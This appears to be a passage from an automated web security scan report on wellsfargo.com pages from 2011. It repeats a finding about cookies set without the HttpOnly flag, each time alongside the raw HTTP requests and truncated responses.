The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /autoloans/apply HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 301 Moved Permanently Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:49 GMT Content-length: 15 Content-type: text/html; charset=ISO-8859-1 X-Cnection: close Location: https://financial.wellsfargo.com/autoapp/tostep1.do?promocode=WLAA11040010 Set-Cookie: wcmcookiewf=Fv9vNJhdHXqhTvtpGZyxXhXVBryX2GtWB5ZTb3zZv6w3Q0v3XypL!1507309987; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2046057226.16927.0000; path=/ Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browser/jaws_setting HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:19 GMT Content-length: 3286 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=gCGwNJhfWxmh2NDPMGhQzzBB1njKkFyRGKJNnjbmVQ2rzhccQTt5!-1657447489; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2348047114.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /careers/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:30:00 GMT Content-length: 7617 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=sG2NNJhL8zpPgGJdS0NpchvpTRWLPJr0HLnS3ss5SYWfnJWcs2V7!1746616152; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2146720522.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:36 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=Q3cLNJhQSJXJ01dhNTVGyQlHhTNfcGvp2PwmMkwzDRSyBnTQJh5n!1192939746; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2515819274.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /com/comintro HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:25 GMT Location: https://www.wellsfargo.com/com/ Set-Cookie: wcmcookiewf=hdNDNJhFB2Vy1gQG4jHHJMtydYJQ6bLJT7Jc3x03KXZTLVhH4VKx!312685559; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2264161034.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/com/">h ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /credit_cards/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:38 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=lcphNJhSDNXQXcnvvp6Pqwv3mHjKLNpN7rmll0htLDpp25KdLbp1!-88744709; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2532596490.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /credit_cards/select_card HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:38 GMT Location: https://www.wellsfargo.com/credit_cards/ Set-Cookie: wcmcookiewf=cnHtNJhSv05Mv5yd9N4HJR2wQH8TNThgFHky9sygWXwY8CTHxjHQ!-1273606700; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1777621770.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/credit_ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /equity/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /equity/rate_payments/information/rate_calc HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:44 GMT Location: https://www.wellsfargo.com/equity/tools/rate_calc Set-Cookie: wcmcookiewf=LG9sNJhYpZTn2Dhm7pS2x0hcpW0hNsZJG2QzvpSYMRFWGZJ5tRlh!-705334509; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2163497738.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/equity/ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /help/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:21 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=fTG5NJhBTvhh8THS9LpgByvt7m89Gy4r1dsVhd3yzr8nQnnF6vzk!349572437; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Customer Service f ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /help/faqs/signon_faqs HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:22 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=vXXtNJhCXy5g11qrwqXKMTLPF3dHrhGLJvg8Wj9MRTTBXJmf9lQT!-1136720127; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /help/services HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:23 GMT Content-length: 11416 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=TYQnNJhDw4QJgQtW7VVtnt2LBv3VJm8hq3Dj4zygqfRB09vyWKnn!191917939; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Customer Service - ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /insurance/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:54 GMT Content-length: 8678 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=FYpQNJhCkvzKSyh2MqHzf7L6MkTTHxnLMf7gMw7y6G64TqKC2T9m!-88744709; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2532596490.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /insurance/id_credit_protection/idtheft HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:55 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=9hF3NJhDTdc9PnjFnWG989NpqqdGyhQPmS2jnC9JQXqKM20QvTm9!-1136720127; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Identity Theft Protection - Id ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/hsa/enroll HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:52 GMT Content-length: 9955 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=rGCpNJhQ3J2yYLGgChygHTVGrrYQnxRYXjGV7X8q1RBBkR0MCZRz!1893615402; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1727290122.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Health Savings Acc ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/investmentservices/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:50 GMT Content-length: 8732 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=3JcNNJhpcnnt2lQ8QP1vrTvQjGQzrsnrVYcCqTsht4tMhdvxRqh3!1507309987; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2046057226.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/more HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:51 GMT Content-length: 12093 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=2H4zNJhfczGZqD2NxFyn8Gw3cRRJsvd31PWX0Bjp5vwZRm5mlXBy!898739336; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/mutual_funds/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:50 GMT Content-length: 12036 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=jrPSNJhptZ2KBS3w22FGDn8wnzWjhJTmp2lJ153w81CP30LvyQTs!1746616152; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2146720522.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Mutual Fund Center ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/retirement/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:50 GMT Content-length: 9837 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=72X3NJhdnllJ1jBN4whcFnn1dmL5hH6sM9yrH5Lk27rBF3pGF0Tb!215502378; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1844730634.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/retirement/openira/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:50 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=YJV8NJhdhdMLGnSv274NzJTQHrvNQ2n3CBLWGMBzrdc8XGhTGsbN!-1672152970; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Open an IRA (Individual Retire ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/about/fdic HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:08 GMT Content-length: 9678 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=x1trNJhJGTGqVyL185v7GXzvQBCvYpMvVYwVg3sGTsGMgTVGz2YG!-1408825807; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1693735690.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/applications/inprogress HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:07 GMT Content-length: 4747 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=6WsvNJhTXvxJ1jsxDf1m1Gy1rlbWnMwpT7vJFPgxrMwwt58cy9lN!-213655893; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2448710410.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/wachovia/EFS/WAC1 HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:05 GMT Content-length: 6663 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=LfRNNJhRvn61Cp8bXrFGLwg6QQKWryy89ht4J427MtcBftWn8JsH!898739336; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/wachovia/insurance/identity HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:06 GMT Content-length: 6816 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=L8vkNJhRGXvkQ866j1p1HL661fxkJ10Hh3p3z1R94dLrvJqJY68V!854257767; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jump/wachovia/mortgage/firsttimebuyer?dm=DMIWEWACP5 HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
